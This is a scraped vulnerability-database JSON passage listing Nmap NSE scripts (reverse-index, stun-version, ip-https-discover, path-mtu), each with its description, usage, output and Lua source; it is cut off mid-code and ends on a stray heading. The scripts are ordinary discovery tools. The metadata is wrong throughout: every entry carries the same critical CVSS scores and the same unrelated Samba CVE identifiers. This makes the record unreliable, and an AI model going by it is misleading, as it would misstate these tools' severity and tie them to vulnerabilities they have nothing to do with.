192.168.0.60\n | 23/tcp: 192.168.0.100\n | 80/tcp: 192.168.0.70\n | 445/tcp: 192.168.0.1\n | 53/udp: 192.168.0.1, 192.168.0.60, 192.168.0.70, 192.168.0.105\n |_ 5353/udp: 192.168.0.1, 192.168.0.60, 192.168.0.70, 192.168.0.105\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-11-29T00:48:59", "type": "nmap", "title": "reverse-index NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-01-19T16:37:36", "id": "NMAP:REVERSE-INDEX.NSE", "href": "https://nmap.org/nsedoc/scripts/reverse-index.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\n\ndescription = [[\nCreates a reverse index at the end of scan output showing which hosts run a\nparticular service. This is in addition to Nmap's normal output listing the\nservices on each host.\n]]\n\n---\n-- @usage\n-- nmap --script reverse-index <hosts/networks>\n--\n-- @output\n-- Post-scan script results:\n-- | reverse-index:\n-- | 22/tcp: 192.168.0.60\n-- | 23/tcp: 192.168.0.100\n-- | 80/tcp: 192.168.0.70\n-- | 445/tcp: 192.168.0.1\n-- | 53/udp: 192.168.0.1, 192.168.0.60, 192.168.0.70, 192.168.0.105\n-- |_ 5353/udp: 192.168.0.1, 192.168.0.60, 192.168.0.70, 192.168.0.105\n--\n-- @args reverse-index.mode the output display mode, can be either horizontal\n-- or vertical (default: horizontal)\n-- @args reverse-index.names If set, index results by service name instead of\n-- port number. Unknown services will be listed by port number.\n--\n-- @xmloutput\n-- <table key=\"ftp/tcp\">\n-- <elem>127.0.0.1</elem>\n-- </table>\n-- <table key=\"http/tcp\">\n-- <elem>45.33.32.156</elem>\n-- <elem>127.0.0.1</elem>\n-- <elem>172.217.9.174</elem>\n-- </table>\n-- <table key=\"https/tcp\">\n-- <elem>172.217.9.174</elem>\n-- </table>\n-- <table key=\"smtp/tcp\">\n-- <elem>127.0.0.1</elem>\n-- </table>\n-- <table key=\"ssh/tcp\">\n-- <elem>45.33.32.156</elem>\n-- <elem>127.0.0.1</elem>\n-- </table>\n--\n\n-- Version 0.1\n-- Created 11/22/2011 - v0.1 - created by Patrik Karlsson\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"safe\" }\n\n-- the postrule displays the reverse-index once all hosts are scanned\npostrule = function() return true end\n\n-- the hostrule iterates over open ports for the host and pushes them into the registry\nhostrule = function() return true end\n\nhostaction = function(host)\n local names = stdnse.get_script_args(SCRIPT_NAME .. \".names\")\n stdnse.debug1(\"names = %s\", names)\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {tcp={}, udp={}}\n local db = nmap.registry[SCRIPT_NAME]\n for _, s in ipairs({\"open\", \"open|filtered\"}) do\n for _, p in ipairs({\"tcp\",\"udp\"}) do\n local port = nil\n while( true ) do\n port = nmap.get_ports(host, port, p, s)\n if ( not(port) ) then break end\n local key = names and port.service or port.number\n if key == \"unknown\" then\n -- If they are sorting by name, don't lump all \"unknown\" together.\n key = port.number\n end\n db[p][key] = db[p][key] or {}\n table.insert(db[p][key], host.ip)\n end\n end\n end\nend\n\npostaction = function()\n local db = nmap.registry[SCRIPT_NAME]\n if ( db == nil ) then\n return nil\n end\n\n local results\n local mode = stdnse.get_script_args(\"reverse-index.mode\") or \"horizontal\"\n\n local results = stdnse.output_table()\n for proto, ports in pairs(db) do\n local portnumbers = tableaux.keys(ports)\n table.sort(portnumbers)\n for _, port in ipairs(portnumbers) do\n local result_entries = ports[port]\n ipOps.ip_sort(result_entries)\n if mode == 'horizontal' then\n outlib.list_sep(result_entries)\n end\n results[(\"%s/%s\"):format(port, proto)] = result_entries\n end\n end\n\n return results\nend\n\nlocal Actions = {\n hostrule = hostaction,\n postrule = postaction\n}\n\n-- execute the action function corresponding to the current rule\naction = function(...) return Actions[SCRIPT_TYPE](...) end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:01", "description": "Sends a binding request to the server and attempts to extract version information from the response, if the server attribute is present.\n\n## Script Arguments \n\n#### stun.mode \n\nSee the documentation for the [stun](<../lib/stun.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU -sV -p 3478 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 3478/udp open stun Vovida.org 0.96\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stun](<../lib/stun.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-16T11:36:51", "type": "nmap", "title": "stun-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:STUN-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/stun-version.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stun = require \"stun\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nSends a binding request to the server and attempts to extract version\ninformation from the response, if the server attribute is present.\n]]\n\n---\n-- @usage\n-- nmap -sU -sV -p 3478 <target>\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 3478/udp open stun Vovida.org 0.96\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"version\"}\n\n\nportrule = shortport.version_port_or_service(3478, \"stun\", \"udp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n local helper = stun.Helper:new(host, port)\n local status = helper:connect()\n if ( not(status) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local status, result = helper:getVersion()\n if ( not(status) ) then\n return fail(\"Failed to retrieve external IP\")\n end\n\n port.version.name = \"stun\"\n port.version.product = result\n nmap.set_port_state(host, port, \"open\")\n nmap.set_port_version(host, port)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:31", "description": "Checks if the IP over HTTPS (IP-HTTPS) Tunneling Protocol [1] is supported. \n\nIP-HTTPS sends Teredo related IPv6 packets over an IPv4-based HTTPS session. This indicates that Microsoft DirectAccess [2], which allows remote clients to access intranet resources on a domain basis, is supported. Windows clients need Windows 7 Enterprise/Ultime or Windows 8.1 Enterprise/Ultimate. Servers need Windows Server 2008 (R2) or Windows Server 2012 (R2). Older versions of Windows and Windows Server are not supported. \n\n[1] <http://msdn.microsoft.com/en-us/library/dd358571.aspx> [2] <http://technet.microsoft.com/en-us/network/dd420463.aspx>\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script ip-https-discover\n \n\n## Script Output \n \n \n 443/tcp open https\n |_ip-https-discover: IP-HTTPS is supported. This indicates that this host supports Microsoft DirectAccess.\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [sslcert](<../lib/sslcert.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-11-03T13:53:20", "type": "nmap", "title": "ip-https-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2016-09-21T03:55:11", "id": "NMAP:IP-HTTPS-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/ip-https-discover.html", "sourceData": "local comm = require 'comm'\nlocal string = require 'string'\nlocal stdnse = require 'stdnse'\nlocal shortport = require 'shortport'\nlocal sslcert = require 'sslcert'\n\ndescription = [[\nChecks if the IP over HTTPS (IP-HTTPS) Tunneling Protocol [1] is supported.\n\nIP-HTTPS sends Teredo related IPv6 packets over an IPv4-based HTTPS session. This\nindicates that Microsoft DirectAccess [2], which allows remote clients to access\nintranet resources on a domain basis, is supported. Windows clients need\nWindows 7 Enterprise/Ultime or Windows 8.1 Enterprise/Ultimate. Servers need\nWindows Server 2008 (R2) or Windows Server 2012 (R2). Older versions\nof Windows and Windows Server are not supported.\n\n[1] http://msdn.microsoft.com/en-us/library/dd358571.aspx\n[2] http://technet.microsoft.com/en-us/network/dd420463.aspx\n]]\n\nauthor = \"Niklaus Schiess <nschiess@adversec.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {'discovery', 'safe', 'default'}\n\n---\n--@usage\n-- nmap --script ip-https-discover\n--\n--@output\n-- 443/tcp open https\n-- |_ip-https-discover: IP-HTTPS is supported. This indicates that this host supports Microsoft DirectAccess.\n--\n\nportrule = function(host, port)\n return shortport.http(host, port) and shortport.ssl(host, port)\nend\n\n-- Tested on a Windows Server 2012 R2 DirectAccess deployment. The URI\n-- /IPTLS from the specification (see description) doesn't seem to work\n-- on recent versions. They may be related to Windows Server 2008 (R2).\nlocal request =\n'POST /IPHTTPS HTTP/1.1\\r\\n' ..\n'Host: %s\\r\\n' ..\n'Content-Length: 18446744073709551615\\r\\n\\r\\n'\n\naction = function(host, port)\n local target\n if host.targetname then\n target = host.targetname\n else\n -- Try to get the hostname from the SSL certificate.\n local status, cert = sslcert.getCertificate(host,port)\n if not status then\n -- fall back to reverse DNS\n target = host.name\n else\n target = cert.subject['commonName']\n end\n end\n\n if not target or target == \"\" then\n return\n end\n\n local socket, response = comm.tryssl(host, port,\n string.format(request, target), { lines=4 })\n if not socket then\n stdnse.debug1('Problem establishing connection: %s', response)\n return\n end\n socket:close()\n\n if string.match(response, 'HTTP/1.1 200%s.+HTTPAPI/2.0') then\n return true, 'IP-HTTPS is supported. This indicates that this host supports Microsoft DirectAccess.'\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:43", "description": "Performs simple Path MTU Discovery to target hosts. \n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set and with varying amounts of data. If an ICMP Fragmentation Needed is received, or no reply is received after retransmissions, the amount of data is lowered and another packet is sent. This continues until (assuming no errors occur) a reply from the final host is received, indicating the packet reached the host without being fragmented. \n\nNot all MTUs are attempted so as to not expend too much time or network resources. Currently the relatively short list of MTUs to try contains the plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\". Using these values significantly cuts down the MTU search space. On top of that, this list is rarely traversed in whole because: \n\n * the MTU of the outgoing interface is used as a starting point, and \n * we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n\n## Example Usage \n \n \n nmap --script path-mtu target\n \n\n## Script Output \n \n \n Host script results:\n |_path-mtu: 1492 <= PMTU < 1500\n \n Host script results:\n |_path-mtu: PMTU == 1006\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-24T01:47:12", "type": "nmap", "title": "path-mtu NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-15T07:26:00", "id": "NMAP:PATH-MTU.NSE", "href": "https://nmap.org/nsedoc/scripts/path-mtu.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms simple Path MTU Discovery to target hosts.\n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set\nand with varying amounts of data. If an ICMP Fragmentation Needed is received,\nor no reply is received after retransmissions, the amount of data is lowered\nand another packet is sent. This continues until (assuming no errors occur) a\nreply from the final host is received, indicating the packet reached the host\nwithout being fragmented.\n\nNot all MTUs are attempted so as to not expend too much time or network\nresources. Currently the relatively short list of MTUs to try contains\nthe plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\".\nUsing these values significantly cuts down the MTU search space. On top\nof that, this list is rarely traversed in whole because:\n* the MTU of the outgoing interface is used as a starting point, and\n* we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n]]\n\n---\n-- @usage\n-- nmap --script path-mtu target\n--\n-- @output\n-- Host script results:\n-- |_path-mtu: 1492 <= PMTU < 1500\n--\n-- Host script results:\n-- |_path-mtu: PMTU == 1006\n\nauthor = \"Kris Katterjohn\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\nlocal IPPROTO_ICMP = packet.IPPROTO_ICMP\nlocal IPPROTO_TCP = packet.IPPROTO_TCP\nlocal IPPROTO_UDP = packet.IPPROTO_UDP\n\n-- Number of times to retransmit for no reply before dropping to\n-- another MTU value\nlocal RETRIES = 1\n\n-- RFC 1191, Table 7-1: Plateaus. Even the massive MTU values are\n-- here since we skip down the list based on the outgoing interface\n-- so its no harm.\nlocal MTUS = {\n 65535,\n 32000,\n 17914,\n 8166,\n 4352,\n 2002,\n 1492,\n 1006,\n 508,\n 296,\n 68\n}\n\n-- Find the index in MTUS{} to use based on the MTU +new+. If +new+ is in\n-- between values in MTUS, then insert it into the table appropriately.\nlocal searchmtu = function(cidx, new)\n if new == 0 then\n return cidx\n end\n\n while cidx <= #MTUS do\n if new >= MTUS[cidx] then\n if new ~= MTUS[cidx] then\n table.insert(MTUS, cidx, new)\n end\n return cidx\n end\n cidx = cidx + 1\n end\n return cidx\nend\n\nlocal dport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_dport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_dport\n end\nend\n\nlocal sport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_sport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_sport\n end\nend\n\n-- Checks how we should react to this packet\nlocal checkpkt = function(reply, orig)\n local ip = packet.Packet:new(reply, reply:len())\n\n if ip.ip_p == IPPROTO_ICMP then\n if ip.icmp_type ~= 3 then\n return \"recap\"\n end\n -- Port Unreachable\n if ip.icmp_code == 3 then\n local is = ip.buf:sub(ip.icmp_offset + 9)\n local ip2 = packet.Packet:new(is, is:len())\n\n -- Check sent packet against ICMP payload\n if ip2.ip_p ~= IPPROTO_UDP or\n ip2.ip_p ~= orig.ip_p or\n ip2.ip_bin_src ~= orig.ip_bin_src or\n ip2.ip_bin_dst ~= orig.ip_bin_dst or\n sport(ip2) ~= sport(orig) or\n dport(ip2) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\n end\n -- Frag needed, DF set\n if ip.icmp_code == 4 then\n local val = ip:u16(ip.icmp_offset + 6)\n return \"nextmtu\", val\n end\n return \"recap\"\n end\n\n if ip.ip_p ~= orig.ip_p or\n ip.ip_bin_src ~= orig.ip_bin_dst or\n ip.ip_bin_dst ~= orig.ip_bin_src or\n dport(ip) ~= sport(orig) or\n sport(ip) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\nend\n\n-- This is all we can use since we can get various protocols back from\n-- different hosts\nlocal check = function(layer3)\n local ip = packet.Packet:new(layer3, layer3:len())\n return ip.ip_bin_dst\nend\n\n-- Updates a packet's info and calculates checksum\nlocal updatepkt = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n ip:tcp_set_sport(math.random(0x401, 0xffff))\n ip:tcp_set_seq(math.random(1, 0x7fffffff))\n ip:tcp_count_checksum()\n elseif ip.ip_p == IPPROTO_UDP then\n ip:udp_set_sport(math.random(0x401, 0xffff))\n ip:udp_set_length(ip.ip_len - ip.ip_hl * 4)\n ip:udp_count_checksum()\n end\n ip:ip_count_checksum()\nend\n\n-- Set up packet header and data to satisfy a certain MTU\nlocal setmtu = function(pkt, mtu)\n if pkt.ip_len < mtu then\n pkt.buf = pkt.buf .. string.rep(\"\\0\", mtu - pkt.ip_len)\n else\n pkt.buf = pkt.buf:sub(1, mtu)\n end\n\n pkt:ip_set_len(mtu)\n pkt.packet_length = mtu\n updatepkt(pkt)\nend\n\nlocal basepkt = function(proto)\n local ibin = stdnse.fromhex(\n \"4500 0014 0000 4000 8000 0000 0000 0000 0000 0000\"\n )\n local tbin = stdnse.fromhex(\n \"0000 0000 0000 0000 0000 0000 6002 0c00 0000 0000 0204 05b4\"\n )\n local ubin = stdnse.fromhex(\n \"0000 0000 0800 0000\"\n )\n\n if proto == IPPROTO_TCP then\n return ibin .. tbin\n elseif proto == IPPROTO_UDP then\n return ibin .. ubin\n end\nend\n\n-- Creates a Packet object for the given proto and port\nlocal genericpkt = function(host, proto, port)\n local pkt = basepkt(proto)\n local ip = packet.Packet:new(pkt, pkt:len())\n\n ip:ip_set_bin_src(host.bin_ip_src)\n ip:ip_set_bin_dst(host.bin_ip)\n\n ip:set_u8(ip.ip_offset + 9, proto)\n ip.ip_p = proto\n\n ip:ip_set_len(pkt:len())\n\n if proto == IPPROTO_TCP then\n ip:tcp_parse(false)\n ip:tcp_set_dport(port)\n elseif proto == IPPROTO_UDP then\n ip:udp_parse(false)\n ip:udp_set_dport(port)\n end\n\n updatepkt(ip)\n\n return ip\nend\n\nlocal ipproto = function(p)\n if p == \"tcp\" then\n return IPPROTO_TCP\n elseif p == \"udp\" then\n return IPPROTO_UDP\n end\n return -1\nend\n\n-- Determines how to probe\nlocal getprobe = function(host)\n local combos = {\n { \"tcp\", \"open\" },\n { \"tcp\", \"closed\" },\n -- udp/open probably only happens when Nmap sends proper\n -- payloads, which doesn't happen in here\n { \"udp\", \"closed\" }\n }\n local proto = nil\n local port = nil\n\n for _, c in ipairs(combos) do\n port = nmap.get_ports(host, nil, c[1], c[2])\n if port then\n proto = c[1]\n break\n end\n end\n\n return proto, port\nend\n\n-- Sets necessary probe data in registry\nlocal setreg = function(host, proto, port)\n host.registry['pathmtuprobe&#

http-majordomo2-dir-traversal NSE Script

Description

Related